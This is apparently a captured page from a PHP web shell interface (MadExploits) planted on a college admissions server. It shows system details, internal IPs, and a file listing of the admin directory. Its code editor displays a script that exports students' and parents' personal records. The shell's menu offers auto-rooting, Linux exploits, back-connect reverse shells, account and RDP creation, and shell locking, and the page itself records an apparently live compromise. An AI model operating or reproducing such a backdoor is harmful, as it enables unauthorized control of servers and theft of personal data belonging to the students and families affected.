Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
conreg /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
dist
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
mailer
[ DIR ]
drwxr-xr-x
adAdminUser.php
7.42
KB
-rw-r--r--
adminDashboard-old.php
5.95
KB
-rw-r--r--
adminDashboard.php
26.61
KB
-rw-r--r--
adminDashboardaug22.php
7.32
KB
-rw-r--r--
adminDashboardjan22.php
6.51
KB
-rw-r--r--
batch.php
344
B
-rw-r--r--
changePassword.php
4.61
KB
-rw-r--r--
class.admin.php
4.23
KB
-rw-r--r--
common.php
2.28
KB
-rw-r--r--
dbconfig.php
1.31
KB
-rw-r--r--
delete_member.php
446
B
-rw-r--r--
delete_memberD.php
456
B
-rw-r--r--
error_log
2.03
KB
-rw-r--r--
exportHostelFee.php
1.17
KB
-rw-r--r--
exportStudentApplicatonDetails...
2.64
KB
-rw-r--r--
exportStudentDetails.php
976
B
-rw-r--r--
exportStudentDetailsaug22.php
0
B
-rw-r--r--
exportStudentDetailsjan22.php
754
B
-rw-r--r--
exportTutionFee.php
1.22
KB
-rw-r--r--
exportTutionFeeSearch.php
1.22
KB
-rw-r--r--
exportcseduApplicatonDetails.p...
1.08
KB
-rw-r--r--
exportcseduApplicatonDetailsau...
1.09
KB
-rw-r--r--
exportcseduApplicatonDetailsja...
1.09
KB
-rw-r--r--
exportcseduFeeDetails.php
817
B
-rw-r--r--
exportcseduFeeDetailsaug22.php
830
B
-rw-r--r--
exportcseduFeeDetailsjan22.php
830
B
-rw-r--r--
forgotPassword.php
6.53
KB
-rw-r--r--
fpass.php
2.97
KB
-rw-r--r--
index.php
4.83
KB
-rw-r--r--
invoice.php
5.78
KB
-rw-r--r--
invoiceHostel.php
4.9
KB
-rw-r--r--
jquery.tableToExcel.js
2.76
KB
-rw-r--r--
logout.php
600
B
-rw-r--r--
register.php
6.62
KB
-rw-r--r--
resetpass.php
5.09
KB
-rw-r--r--
tutionFee.php
19.89
KB
-rw-r--r--
updateBatch.php
5.9
KB
-rw-r--r--
updateBatchFee.php
7.1
KB
-rw-r--r--
updateFeeDate.php
9.87
KB
-rw-r--r--
verify.php
2.46
KB
-rw-r--r--
viewApplicationDetailsaug22.ph...
6.18
KB
-rw-r--r--
viewApplicationDetailsjan22.ph...
6.18
KB
-rw-r--r--
viewApplicatonDetails.php
6.16
KB
-rw-r--r--
viewHostelFee.php
9.22
KB
-rw-r--r--
viewPaymentDetails.php
4.86
KB
-rw-r--r--
viewPaymentDetailsaug22.php
4.89
KB
-rw-r--r--
viewPaymentDetailsjan22.php
4.91
KB
-rw-r--r--
viewStudentDetails-old.php
13.75
KB
-rw-r--r--
viewStudentDetails.php
20.86
KB
-rw-r--r--
viewTutionFee.php
9.46
KB
-rw-r--r--
viewapplications.php
13.75
KB
-rw-r--r--
viewapplicationsjan22.php
14.1
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : exportStudentApplicatonDetails.php
<?php require_once 'dbconfig.php'; if(isset($_POST["Export"])){ header('Content-Type: text/csv; charset=utf-8'); header('Content-Disposition: attachment; filename=studentApplicationDetails.csv'); $output = fopen("php://output", "w"); fputcsv($output, array('Application Number','Student Name','Transaction ID','Country Code','Mobile Number','altCountry Code','AlternateContact','Current Address','Country','State','District','Postal Code','Gender','Dob','Birth Country','Citizenship',' Email ID','Parent Name1','Parent Country Code1','Parent Mobile Number1','Parent Current Address','pCountry1','pState1','pdistrict1','ppostalCode1','pCitizenship1','pEmailID','parentName2','pcountrycode2','pmobileNumber2','Parent Current Address2','Parent Country2','Parent State2','Parent district2','Parent postal Code2','Parent Citizenship2','Parent EmailId2', 'student Email','College Name','College Address','educational country',' estate',' edistrict','epostalCode',' nameofdegree','discipline','aggregatePercentage','pgcollegeName','pgcollegeAddress',' pgCountry',' pgState',' pgDistrict','pgPostalCode',' pgNameofDegree','pgDiscipline','pgAggregatePercentage','nOrganisation','pFrom','pTo','designation','nOrganisationB','pFromB',' pToB','designationB','awards')); $query = "SELECT s.studentID,s.studentName,p.transactionID,p.countryCode,p.mobileNumber,p.altCountryCode,p.alternateContact,p.currentAddress,p.country,p.state,p.district,p.postalCode,p.gender,p.dob,p.birthCountry,p.citizenship,p. emailID,p.parentName1,p.PcountryCode1,p.PmobileNumber1,p.pcurrentAddress,p.pCountry1,p.pState1,p.pdistrict1,p.ppostalCode1,p.pCitizenship1,p.pEmailID,p.parentName2,p.pcountrycode2,p.pmobileNumber2,p.pCurrentAddress2,p.pCountry2,p.pState2,p.pdistrict2,p.ppostalCode2,p.pCitizenship2,p.pEmailId2, e.studentEmail,e.collegeName,e.collegeAddress,e.ecountry,e. estate,e. edistrict,e.epostalCode,e. nameofdegree,e.discipline,e.aggregatePercentage,e.pgcollegeName,e.pgcollegeAddress,e. pgCountry,e. pgState,e. pgDistrict,e.pgPostalCode,e. pgNameofDegree,e.pgDiscipline,e.pgAggregatePercentage,e.nOrganisation,e.pFrom,e.pTo,e.designation,e.nOrganisationB,e.pFromB,e. pToB,e.designationB,e.awards FROM educationalqualification e, personalinformation p, studentregistration s where e.studentID =p.studentID and s.studentID = e.studentID and p.studentID = s.studentID and p.status ='ACTIVE' and e.status ='ACTIVE' ORDER BY p.PID Desc "; $result = mysqli_query($connection, $query); while($row = mysqli_fetch_assoc($result)) { fputcsv($output, $row); } fclose($output); } ?>
Close